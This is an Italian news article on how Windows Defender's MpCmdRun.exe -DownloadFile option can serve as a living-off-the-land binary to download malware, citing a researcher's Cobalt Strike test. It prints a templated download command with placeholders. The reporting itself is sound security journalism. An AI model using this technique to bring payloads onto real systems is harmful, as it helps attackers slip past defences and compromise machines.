Windows Defender in Windows 10 è la prima linea di difesa in caso di attacchi di malware e fa anche un buon lavoro.
Tuttavia, in uno dei suoi nuovi aggiornamenti, il potente antivirus ha ottenuto un nuovo comando DownloadFile, che consentirà a chiunque di scaricare qualsiasi file da un URL a un determinato percorso sul tuo computer.
Possiamo definirlo un exploit poiché potrebbe essere utilizzato anche per scaricare malware, una cosa che è stata scoperta dal ricercatore di sicurezza Mohammad Askar che ha pubblicato la sua scoperta su Twitter.
Come può essere utilizzato Windows Defender per scaricare malware?
È davvero semplice utilizzare l'utilità della riga di comando del servizio antimalware Microsoft (MpCmdRun.exe) per scaricare qualsiasi file da una fonte esterna sul tuo computer.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
Nel suo tentativo, Askar è stato in grado di scaricare il beacon Cobalt Strike, un noto strumento di attacco utilizzando questa riga di comando.
Il nuovo comando è incluso nella versione 4.18.2007.8-0 e successive che offre un buon tempo di inizio per gli attaccanti.
Fondamentalmente, questa funzionalità trasforma Windows Defender in un LOLBIN (che vive fuori dai binari di linea), un file di sistema innocuo che può essere utilizzato per scopi dannosi.
Fortunatamente, dopo aver scaricato il file dannoso, verrà rilevato dallo stesso Windows Defender o da un altro software antivirus se presente.
Da un software di protezione affidabile, Windows Defender si è trasformato in un'altra possibile minaccia che dovrà essere attentamente monitorata da amministratori ed esperti di sicurezza.
Se hai suggerimenti o commenti, ti preghiamo di lasciarli qui sotto nella sezione Commenti.